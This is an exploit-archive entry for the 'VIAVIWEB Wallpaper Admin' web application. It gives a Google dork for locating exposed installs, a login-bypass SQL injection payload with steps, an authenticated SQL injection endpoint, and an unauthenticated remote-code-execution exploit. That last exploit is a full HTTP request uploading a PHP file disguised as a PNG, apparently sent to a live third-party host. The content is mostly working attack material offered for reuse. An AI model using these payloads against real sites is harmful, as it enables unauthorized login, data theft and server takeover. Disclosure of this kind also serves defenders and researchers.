Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
Change Mirror[11] Download[12]
```
# Exploit Title: [VIAVIWEB Wallpaper Admin - Multiple vulnrabilities]
# Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username"
# Date: [18/09/2022]
# Exploit Author: [Edd13Mora]
# Vendor Homepage: [www.viaviweb.com]
# Version: [N/A]
# Tested on: [Windows 11 - Kali Linux]
------------------
SQLI on the Login page
------------------
payload --> admin' or 1=1-- -
---
POC:
---
[1] Disable JavaScript on ur browser put the payload and submit
[2] Reactive JavaScript and resend the request
---------------------------
Authenticated SQL Injection:
---------------------------
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]
-----------------------------------------------
Remote Code Execution (RCE none authenticated):
-----------------------------------------------
Poc:
----
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes
--------------------
Burp Request :
--------------------
POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2
Host: http://googlezik.freehostia.com
Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848
Content-Length: 467
Origin: http://googlezik.freehostia.com
Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="category_id"
1
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="image[]"; filename="poc.php"
Content-Type: image/png
<?php phpinfo(); ?>
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="submit"
-----------------------------33893919268150571572221367848--
Uploaded File can be found here :
--------------------------------
http://localhost/PAth-Where-Script-Installed/categories/
```
File Tags
- ActiveX[17] (932)
- Advisory[18] (78,210)
- Arbitrary[19] (15,257)
- BBS[20] (2,859)
- Bypass[21] (1,582)
- CGI[22] (1,013)
- Code Execution[23] (6,759)
- Conference[24] (671)
- Cracker[25] (799)
- CSRF[26] (3,275)
- DoS[27] (22,040)
- Encryption[28] (2,339)
- Exploit[29] (50,083)
- File Inclusion[30] (4,160)
- File Upload[31] (945)
- Firewall[32] (821)
- Info Disclosure[33] (2,564)
- Intrusion Detection[34] (859)
- Java[35] (2,822)
- JavaScript[36] (806)
- Kernel[37] (6,142)
- Local[38] (14,083)
- Magazine[39] (586)
- Overflow[40] (12,249)
- Perl[41] (1,413)
- PHP[42] (5,057)
- Proof of Concept[43] (2,284)
- Protocol[44] (3,345)
- Python[45] (1,405)
- Remote[46] (29,839)
- Root[47] (3,463)
- Ruby[48] (580)
- Scanner[49] (1,630)
- Security Tool[50] (7,732)
- Shell[51] (3,075)
- Shellcode[52] (1,203)
- Sniffer[53] (883)
- Spoof[54] (2,122)
- SQL Injection[55] (16,054)
- TCP[56] (2,368)
- Trojan[57] (680)
- UDP[58] (871)
- Virus[59] (660)
- Vulnerability[60] (30,637)
- Web[61] (9,101)
- Whitepaper[62] (3,723)
- x86[63] (943)
- XSS[64] (17,382)
- Other[65]
File Archives
- September 2022[66]
- August 2022[67]
- July 2022[68]
- June 2022[69]
- May 2022[70]
- April 2022[71]
- March 2022[72]
- February 2022[73]
- January 2022[74]
- December 2021[75]
- November 2021[76]
- October 2021[77]
- Older[78]
Systems
- AIX[79] (426)
- Apple[80] (1,899)
- BSD[81] (369)
- CentOS[82] (55)
- Cisco[83] (1,915)
- Debian[84] (5,948)
- Fedora[85] (1,690)
- FreeBSD[86] (1,242)
- Gentoo[87] (4,197)
- HPUX[88] (878)
- iOS[89] (323)
- iPhone[90] (108)
- IRIX[91] (220)
- Juniper[92] (67)
- Linux[93] (42,855)
- Mac OS X[94] (684)
- Mandriva[95] (3,105)
- NetBSD[96] (255)
- OpenBSD[97] (478)
- RedHat[98] (11,979)
- Slackware[99] (941)
- Solaris[100] (1,607)
- SUSE[101] (1,444)
- Ubuntu[102] (8,001)
- UNIX[103] (9,111)
- UnixWare[104] (185)
- Windows[105] (6,465)
- Other[106]